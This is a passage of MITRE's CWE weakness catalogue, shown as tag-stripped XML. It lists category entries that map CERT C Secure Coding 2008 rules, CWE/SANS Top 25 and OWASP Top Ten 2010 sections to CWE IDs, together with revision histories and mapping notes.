before comparing or assigning to that size + CWE-682 INT07-C Use only explicitly signed or unsigned char type for numeric values + CWE-682 INT13-C Use bitwise operators only on unsigned operands + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 04 - Integers (INT) + CERT C Secure Coding (2008 Version) Section 04 - Integers (INT) + + + + Weaknesses in this category are related to the rules and recommendations in the Floating Point (FLP) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-369 FLP03-C Detect and handle floating point errors + CWE-681 FLP33-C Convert integers to floating point for floating point operations + CWE-681 FLP34-C Ensure that floating point conversions are within range of the new type + CWE-682 FLP32-C Prevent or detect domain and range errors in math functions + CWE-682 FLP33-C Convert integers to floating point for floating point operations + CWE-686 FLP31-C Do not call functions expecting real values with complex values + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, References, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 05 - Floating Point (FLP) + CERT C Secure Coding (2008 Version) Section 05 - Floating Point (FLP) + + + + Weaknesses in this category are related to the rules and recommendations in the Arrays (ARR) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-119 ARR00-C Understand how arrays work + CWE-119 ARR33-C Guarantee that copies are made into storage of sufficient size + CWE-119 ARR34-C Ensure that array types in expressions are compatible + CWE-119 ARR35-C Do not allow loops to iterate beyond the end of an array + CWE-129 ARR00-C Understand how arrays work + CWE-129 ARR30-C Guarantee that array indices are within the valid range + CWE-129 ARR38-C Do not add or subtract an integer to a pointer if the resulting value does not refer to a valid array element + CWE-467 ARR01-C Do not apply the sizeof operator to a pointer when taking the size of an array + CWE-469 ARR36-C Do not subtract or compare two pointers that do not refer to the same array + CWE-469 ARR37-C Do not add or subtract an integer to a pointer to a non-array object + CWE-665 ARR02-C Explicitly specify array bounds, even if implicitly defined by an initializer + CWE-805 ARR33-C Guarantee that copies are made into storage of sufficient size + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 06 - Arrays (ARR) + CERT C Secure Coding (2008 Version) Section 06 - Arrays (ARR) + + + + Weaknesses in this category are related to the rules and recommendations in the Characters and Strings (STR) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-78 STR02-C Sanitize data passed to complex subsystems + CWE-88 STR02-C Sanitize data passed to complex subsystems + CWE-119 STR31-C Guarantee that storage for strings has sufficient space for character data and the null terminator + CWE-119 STR32-C Null-terminate byte strings as required + CWE-119 STR33-C Size wide character strings correctly + CWE-120 STR35-C Do not copy data from an unbounded source to a fixed-length array + CWE-135 STR33-C Size wide character strings correctly + CWE-170 STR03-C Do not inadvertently truncate a null-terminated byte string + CWE-170 STR32-C Null-terminate byte strings as required + CWE-193 STR31-C Guarantee that storage for strings has sufficient space for character data and the null terminator + CWE-464 STR03-C Do not inadvertently truncate a null-terminated byte string + CWE-464 STR06-C Do not assume that strtok() leaves the parse string unchanged + CWE-686 STR37-C Arguments to character handling functions must be representable as an unsigned char + CWE-704 STR34-C Cast characters to unsigned types before converting to larger integer sizes + CWE-704 STR37-C Arguments to character handling functions must be representable as an unsigned char + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 07 - Characters and Strings (STR) + CERT C Secure Coding (2008 Version) Section 07 - Characters and Strings (STR) + + + + Weaknesses in this category are related to the rules and recommendations in the Memory Management (MEM) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-20 MEM10-C Define and use a pointer validation function + CWE-119 MEM09-C Do not assume memory allocation routines initialize memory + CWE-128 MEM07-C Ensure that the arguments to calloc(), when multiplied, can be represented as a size_t + CWE-131 MEM35-C Allocate sufficient memory for an object + CWE-190 MEM07-C Ensure that the arguments to calloc(), when multiplied, can be represented as a size_t + CWE-190 MEM35-C Allocate sufficient memory for an object + CWE-226 MEM03-C Clear sensitive information stored in reusable resources returned for reuse + CWE-244 MEM03-C Clear sensitive information stored in reusable resources returned for reuse + CWE-252 MEM32-C Detect and handle memory allocation errors + CWE-415 MEM00-C Allocate and free memory in the same module, at the same level of abstraction + CWE-415 MEM01-C Store a new value in pointers immediately after free() + CWE-415 MEM31-C Free dynamically allocated memory exactly once + CWE-416 MEM00-C Allocate and free memory in the same module, at the same level of abstraction + CWE-416 MEM01-C Store a new value in pointers immediately after free() + CWE-416 MEM30-C Do not access freed memory + CWE-476 MEM32-C Detect and handle memory allocation errors + CWE-528 MEM06-C Ensure that sensitive data is not written out to disk + CWE-590 MEM34-C Only free memory allocated dynamically + CWE-591 MEM06-C Ensure that sensitive data is not written out to disk + CWE-628 MEM08-C Use realloc() only to resize dynamically allocated arrays + CWE-665 MEM09-C Do not assume memory allocation routines initialize memory + CWE-687 MEM04-C Do not perform zero length allocations + CWE-754 MEM32-C Detect and handle memory allocation errors + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 08 - Memory Management (MEM) + CERT C Secure Coding (2008 Version) Section 08 - Memory Management (MEM) + + + + Weaknesses in this category are related to the rules and recommendations in the Input Output (FIO) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-22 FIO02-C Canonicalize path names originating from untrusted sources + CWE-37 FIO05-C Identify files using multiple file attributes + CWE-38 FIO05-C Identify files using multiple file attributes + CWE-39 FIO05-C Identify files using multiple file attributes + CWE-41 FIO02-C Canonicalize path names originating from untrusted sources + CWE-59 FIO02-C Canonicalize path names originating from untrusted sources + CWE-62 FIO05-C Identify files using multiple file attributes + CWE-64 FIO05-C Identify files using multiple file attributes + CWE-65 FIO05-C Identify files using multiple file attributes + CWE-67 FIO32-C Do not perform operations on devices that are only appropriate for files + CWE-119 FIO37-C Do not assume character data has been read + CWE-134 FIO30-C Exclude user input from format strings + CWE-134 FIO30-C Exclude user input from format strings + CWE-241 FIO37-C Do not assume character data has been read + CWE-276 FIO06-C Create files with appropriate access permissions + CWE-279 FIO06-C Create files with appropriate access permissions + CWE-362 FIO31-C Do not simultaneously open the same file multiple times + CWE-367 FIO01-C Be careful using functions that use file names for identification + CWE-379 FIO15-C Ensure that file operations are performed in a secure directory + CWE-379 FIO43-C Do not create temporary files in shared directories + CWE-391 FIO04-C Detect and handle input and output errors + CWE-391 FIO33-C Detect and handle input output errors resulting in undefined behavior + CWE-403 FIO42-C Ensure files are properly closed when they are no longer needed + CWE-404 FIO42-C Ensure files are properly closed when they are no longer needed + CWE-552 FIO15-C Ensure that file operations are performed in a secure directory + CWE-675 FIO31-C Do not simultaneously open the same file multiple times + CWE-676 FIO01-C Be careful using functions that use file names for identification + CWE-686 FIO00-C Take care when creating format strings + CWE-732 FIO06-C Create files with appropriate access permissions + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 09 - Input Output (FIO) + CERT C Secure Coding (2008 Version) Section 09 - Input Output (FIO) + + + + Weaknesses in this category are related to the rules and recommendations in the Environment (ENV) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-78 ENV03-C Sanitize the environment when invoking external programs + CWE-78 ENV04-C Do not call system() if you do not need a command processor + CWE-88 ENV03-C Sanitize the environment when invoking external programs + CWE-88 ENV04-C Do not call system() if you do not need a command processor + CWE-119 ENV01-C Do not make assumptions about the size of an environment variable + CWE-426 ENV03-C Sanitize the environment when invoking external programs + CWE-462 ENV02-C Beware of multiple environment variables with the same effective name + CWE-705 ENV32-C All atexit handlers must return normally + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 10 - Environment (ENV) + CERT C Secure Coding (2008 Version) Section 10 - Environment (ENV) + + + + Weaknesses in this category are related to the rules and recommendations in the Signals (SIG) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-432 SIG00-C Mask signals handled by noninterruptible signal handlers + CWE-479 SIG30-C Call only asynchronous-safe functions within signal handlers + CWE-479 SIG32-C Do not call longjmp() from inside a signal handler + CWE-479 SIG33-C Do not recursively invoke the raise() function + CWE-479 SIG34-C Do not call signal() from within interruptible signal handlers + CWE-662 SIG00-C Mask signals handled by noninterruptible signal handlers + CWE-662 SIG31-C Do not access or modify shared objects in signal handlers + CWE-828 SIG31-C Do not access or modify shared objects in signal handlers + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 11 - Signals (SIG) + CERT C Secure Coding (2008 Version) Section 11 - Signals (SIG) + + + + Weaknesses in this category are related to the rules and recommendations in the Error Handling (ERR) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-20 ERR07-C Prefer functions that support error checking over equivalent functions that don't + CWE-391 ERR00-C Adopt and implement a consistent and comprehensive error-handling policy + CWE-544 ERR00-C Adopt and implement a consistent and comprehensive error-handling policy + CWE-676 ERR07-C Prefer functions that support error checking over equivalent functions that don't + CWE-705 ERR04-C Choose an appropriate termination strategy + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 12 - Error Handling (ERR) + CERT C Secure Coding (2008 Version) Section 12 - Error Handling (ERR) + + + + Weaknesses in this category are related to the rules and recommendations in the Miscellaneous (MSC) chapter of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-14 MSC06-C Be aware of compiler optimization when dealing with sensitive data + CWE-20 MSC08-C Library functions should validate their parameters + CWE-176 MSC10-C Character Encoding - UTF8 Related Issues + CWE-330 MSC30-C Do not use the rand() function for generating pseudorandom numbers + CWE-480 MSC02-C Avoid errors of omission + CWE-480 MSC03-C Avoid errors of addition + CWE-482 MSC02-C Avoid errors of omission + CWE-561 MSC07-C Detect and remove dead code + CWE-563 MSC00-C Compile cleanly at high warning levels + CWE-570 MSC00-C Compile cleanly at high warning levels + CWE-571 MSC00-C Compile cleanly at high warning levels + CWE-697 MSC31-C Ensure that return values are compared against the proper type + CWE-704 MSC31-C Ensure that return values are compared against the proper type + CWE-758 MSC14-C Do not introduce unnecessary platform dependencies + CWE-758 MSC15-C Do not depend on undefined behavior + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 49 - Miscellaneous (MSC) + CERT C Secure Coding (2008 Version) Section 49 - Miscellaneous (MSC) + + + + Weaknesses in this category are related to the rules and recommendations in the POSIX (POS) appendix of the CERT C Secure Coding Standard (2008). + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + In the 2008 version of the CERT C Secure Coding standard, the following rules were mapped to the following CWE IDs: + + CWE-59 POS01-C Check for the existence of links when dealing with files + CWE-170 POS30-C Use the readlink() function properly + CWE-242 POS33-C Do not use vfork() + CWE-272 POS02-C Follow the principle of least privilege + CWE-273 POS37-C Ensure that privilege relinquishment is successful + CWE-363 POS35-C Avoid race conditions while checking for the existence of a symbolic link + CWE-366 POS00-C Avoid race conditions with multiple threads + CWE-562 POS34-C Do not call putenv() with a pointer to an automatic variable as the argument + CWE-667 POS31-C Do not unlock or destroy another thread's mutex + CWE-686 POS34-C Do not call putenv() with a pointer to an automatic variable as the argument + CWE-696 POS36-C Observe correct revocation order while relinquishing privileges + + + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationship_Notes + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + CERT C Secure Coding Section 50 - POSIX (POS) + CERT C Secure Coding (2008 Version) Section 50 - POSIX (POS) + + + + Weaknesses in this category are listed in the "Insecure Interaction Between Components" section of the 2009 CWE/SANS Top 25 Programming Errors. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2009-01-12 + 1.2 + 2009-01-12 + + + CWE Content Team + MITRE + 2010-02-16 + updated Name + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insecure Interaction Between Components + + + + Weaknesses in this category are listed in the "Risky Resource Management" section of the 2009 CWE/SANS Top 25 Programming Errors. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2009-01-12 + 1.2 + 2009-01-12 + + + CWE Content Team + MITRE + 2010-02-16 + updated Name + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Risky Resource Management + + + + Weaknesses in this category are listed in the "Porous Defenses" section of the 2009 CWE/SANS Top 25 Programming Errors. + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2009-01-12 + 1.2 + 2009-01-12 + + + CWE Content Team + MITRE + 2010-02-16 + updated Name, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Porous Defenses + + + + Weaknesses in this category are listed in the "Insecure Interaction Between Components" section of the 2010 CWE/SANS Top 25 Programming Errors. + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-01-15 + 1.8 + 2010-02-16 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are listed in the "Risky Resource Management" section of the 2010 CWE/SANS Top 25 Programming Errors. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-01-15 + 1.8 + 2010-02-16 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are listed in the "Porous Defenses" section of the 2010 CWE/SANS Top 25 Programming Errors. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-01-15 + 1.8 + 2010-02-16 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are not part of the general Top 25, but they were part of the original nominee list from which the Top 25 was drawn. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-02-12 + 1.8 + 2010-02-16 + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2010. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2010. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A3 category in the OWASP Top Ten 2010. + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A4 category in the OWASP Top Ten 2010. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A5 category in the OWASP Top Ten 2010. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A6 category in the OWASP Top Ten 2010. + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A7 category in the OWASP Top Ten 2010. + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A8 category in the OWASP Top Ten 2010. + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2010. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A10 category in the OWASP Top Ten 2010. + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2010-06-17 + 1.9 + 2010-06-21 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category identify some of the underlying problems that commonly allow attackers to manipulate the business logic of an application. Errors in business logic can be devastating to an entire application. They can be difficult to find automatically, since they typically involve legitimate use of the application's functionality. However, many business logic errors can exhibit patterns that are similar to well-understood implementation and design weaknesses. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + The "Business Logic" term is generally used to describe issues that require domain-specific knowledge or "business rules" to determine if they are weaknesses or vulnerabilities, instead of legitimate behavior. Such issues might not be easily detectable via automatic code analysis, because the associated operations do not produce clear errors or undefined behavior at the code level. However, many such "business logic" issues can be understood as instances of other weaknesses such as input validation, access control, numeric computation, order of operations, etc. + + + The classification of business logic flaws has been under-studied, although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles. + Many business logic flaws appear to be oriented toward business processes, application flows, and sequences of behaviors, which are not as well-represented in CWE as weaknesses related to input validation, memory management, etc. + + + + + CWE Content Team + MITRE + 2011-03-24 + 1.12 + 2011-03-30 + + 